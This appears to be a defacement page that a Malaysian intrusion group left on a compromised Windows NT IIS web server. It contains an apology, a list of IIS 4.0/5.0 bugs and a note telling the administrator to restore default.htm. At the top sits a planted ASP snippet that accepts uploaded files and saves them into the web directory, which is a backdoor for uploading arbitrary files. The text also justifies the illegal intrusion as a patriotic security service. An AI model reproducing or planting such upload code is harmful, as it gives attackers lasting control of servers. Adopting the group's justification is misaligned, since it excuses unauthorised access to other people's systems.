File :
[an error occurred while processing this directive]<% If Request.ServerVariables("REQUEST_METHOD") = "POST" Then Set Fields = GetUpload() FilePath = Server.MapPath(".") & "\" & Fields("File1").FileName Fields("File1").Value.SaveAs FilePath End If %>ECHO is on.



"Our mission is to upgrade all *Malaysian Servers* and to protect any Malaysian websites
from any intruders after every site defaced by us"


Operating System :
Window NT4 Server Version

Bugs :
Microsoft NT IIS 4.0/IIS 5.0 Webserver

So many bugs at your systems. Please Patch your NT As Soon As Possible.Sorry About This!

Patch :
1. The simple way to protect your system from this bugs you just can install BSD OS
2. IIS 4.0
3. IIS 5.0

Comment :
We would like to say sorry for what we have done. But we have to because if we dont do this others people will do.
And its more danger if foreign intruders get into our (Malaysian) system. We know this illegal and we could put ourself
into a *JAIL*. WE AGREE what our goverment try to build and create on our country MSC, CyberJaya and so on.
Who knows we are fanatic about our 'IT Security'.

We can go further on every step we try to reach. 'Malaysia Boleh'. Once again 'WE WOULD LIKE TO APOLOGIZE'
to all Malaysian. Let us know what we should do. Coz we just cant stop 'how fanatic we are' about IT Security. We just hope
we have our good community just like other people. We dont have enuf money to make our own building or rakan muda,
HQ or something like a center for us to say, come out with our knowledge. WE DONT HAVE ANY WHITE PAPERS, DEGREE, DIPLOMA and so on. Just look how poor my english is.

To all Malaysian once again *SORRY* for what we have done.


ps :/

remove default.htm to c:/inetpub/wwwroot/default.bak



ECHO is on. ECHO is on.